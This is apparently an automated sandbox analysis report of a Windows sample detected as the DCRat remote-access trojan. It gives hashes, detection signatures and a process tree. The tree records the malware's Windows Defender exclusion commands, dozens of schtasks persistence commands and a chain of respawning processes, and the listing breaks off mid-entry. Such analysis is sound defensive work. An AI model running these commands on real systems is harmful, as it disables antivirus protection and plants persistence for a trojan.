Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/12/2024, 21:16 UTC

General

  • Target

    JaffaCakes118_eb7aeab45fa38000ca3f056c4ab4f9591da273abcd7902961c69caab690e951a.exe

  • Size

    1.3MB

  • MD5

    1ad2438558c7e3cd8d056fc3e82fa5d9

  • SHA1

    648af128b0c42514f6d8c3fefd26b40f709ce6ab

  • SHA256

    eb7aeab45fa38000ca3f056c4ab4f9591da273abcd7902961c69caab690e951a

  • SHA512

    0afb9ee48dcd38e5e88bea63ba4f82b55b323c9dd8ee65c9905b3f00765fdc7d08f4b64fee3e327a16de0b992226fda48a59821ab3ef22342c4efea82f40ef83

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Malware Config

Signatures

  • DcRat

    DarkCrystal (DC) is a new .NET RAT, active since June 2019, capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 57 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 2 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 14 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 13 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 57 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_eb7aeab45fa38000ca3f056c4ab4f9591da273abcd7902961c69caab690e951a.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_eb7aeab45fa38000ca3f056c4ab4f9591da273abcd7902961c69caab690e951a.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4544
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1716
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2432
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1440
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4604
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\System.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1460
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\SppExtComObj.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\fontdrvhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:376
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:448
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\SearchApp.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:372
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Crashpad\TextInputHost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1012
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\smss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1532
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\fontdrvhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4788
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1544
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Registry.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:540
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\winlogon.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4508
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\es-ES\smss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2288
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\sihost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:772
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\SppExtComObj.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2592
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\SearchApp.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2184
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\RuntimeBroker.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4804
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\unsecapp.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1292
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Registry.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:812
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\debug\dllhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1988
          • C:\Recovery\WindowsRE\conhost.exe
            "C:\Recovery\WindowsRE\conhost.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4896
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ww6iFNwlpp.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2980
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:5196
                • C:\Recovery\WindowsRE\conhost.exe
                  "C:\Recovery\WindowsRE\conhost.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:5360
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lZfwAG7KGX.bat"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2916
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      9⤵
                        PID:5612
                      • C:\Recovery\WindowsRE\conhost.exe
                        "C:\Recovery\WindowsRE\conhost.exe"
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:5888
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ys8lvSze9b.bat"
                          10⤵
                            PID:2320
                            • C:\Windows\system32\w32tm.exe
                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              11⤵
                                PID:3324
                              • C:\Recovery\WindowsRE\conhost.exe
                                "C:\Recovery\WindowsRE\conhost.exe"
                                11⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Modifies registry class
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1720
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bf2k7CZMYL.bat"
                                  12⤵
                                    PID:696
                                    • C:\Windows\system32\w32tm.exe
                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      13⤵
                                        PID:372
                                      • C:\Recovery\WindowsRE\conhost.exe
                                        "C:\Recovery\WindowsRE\conhost.exe"
                                        13⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Modifies registry class
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5772
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SvvYNrLnHE.bat"
                                          14⤵
                                            PID:3232
                                            • C:\Windows\system32\w32tm.exe
                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              15⤵
                                                PID:5788
                                              • C:\Recovery\WindowsRE\conhost.exe
                                                "C:\Recovery\WindowsRE\conhost.exe"
                                                15⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2020
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iYTmIkWLiw.bat"
                                                  16⤵
                                                    PID:5964
                                                    • C:\Windows\system32\w32tm.exe
                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                      17⤵
                                                        PID:5540
                                                      • C:\Recovery\WindowsRE\conhost.exe
                                                        "C:\Recovery\WindowsRE\conhost.exe"
                                                        17⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Modifies registry class
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5740
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\N4rS0hE0df.bat"
                                                          18⤵
                                                            PID:3296
                                                            • C:\Windows\system32\w32tm.exe
                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                              19⤵
                                                                PID:3152
                                                              • C:\Recovery\WindowsRE\conhost.exe
                                                                "C:\Recovery\WindowsRE\conhost.exe"
                                                                19⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Modifies registry class
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4408
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bf2k7CZMYL.bat"
                                                                  20⤵
                                                                    PID:1836
                                                                    • C:\Windows\system32\w32tm.exe
                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                      21⤵
                                                                        PID:2980
                                                                      • C:\Recovery\WindowsRE\conhost.exe
                                                                        "C:\Recovery\WindowsRE\conhost.exe"
                                                                        21⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • Modifies registry class
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4828
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat"
                                                                          22⤵
                                                                            PID:3276
                                                                            • C:\Windows\system32\w32tm.exe
                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                              23⤵
                                                                                PID:5608
                                                                              • C:\Recovery\WindowsRE\conhost.exe
                                                                                "C:\Recovery\WindowsRE\conhost.exe"
                                                                                23⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Modifies registry class
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5356
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lZfwAG7KGX.bat"
                                                                                  24⤵
                                                                                    PID:528
                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      25⤵
                                                                                        PID:2916
                                                                                      • C:\Recovery\WindowsRE\conhost.exe
                                                                                        "C:\Recovery\WindowsRE\conhost.exe"
                                                                                        25⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5472
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\J6RTVEKunr.bat"
                                                                                          26⤵
                                                                                            PID:960
                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                              27⤵
                                                                                                PID:4472
                                                                                              • C:\Recovery\WindowsRE\conhost.exe
                                                                                                "C:\Recovery\WindowsRE\conhost.exe"
                                                                                                27⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Modifies registry class
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3876
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Xnyek1SZun.bat"
                                                                                                  28⤵
                                                                                                    PID:5704
                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                      29⤵
                                                                                                        PID:5436
                                                                                                      • C:\Recovery\WindowsRE\conhost.exe
                                                                                                        "C:\Recovery\WindowsRE\conhost.exe"
                                                                                                        29⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4988
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\providercommon\System.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1492
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2012
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2920
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\providercommon\SppExtComObj.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:5104
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\providercommon\SppExtComObj.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2684
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\providercommon\SppExtComObj.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2940
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\fontdrvhost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2412
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\fontdrvhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1444
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Program Files\Uninstall Information\fontdrvhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1000
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4624
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3296
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3932
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\SearchApp.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4848
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\SearchApp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:904
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\SearchApp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:5008
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Program Files\Crashpad\TextInputHost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1936
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\Crashpad\TextInputHost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1108
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 7 /tr "'C:\Program Files\Crashpad\TextInputHost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:696
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\smss.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2712
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\smss.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4768
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\smss.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2724
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Saved Games\fontdrvhost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4076
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\fontdrvhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1036
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Saved Games\fontdrvhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1864
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4824
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3116
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1792
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Registry.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1192
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2784
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2388
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\providercommon\winlogon.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4684
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\providercommon\winlogon.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4020
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\providercommon\winlogon.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1040
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\smss.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4064
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\smss.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3760
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\smss.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4028
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\sihost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:944
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\sihost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2744
                                              • C:\Windows\system32\schtasks.exe
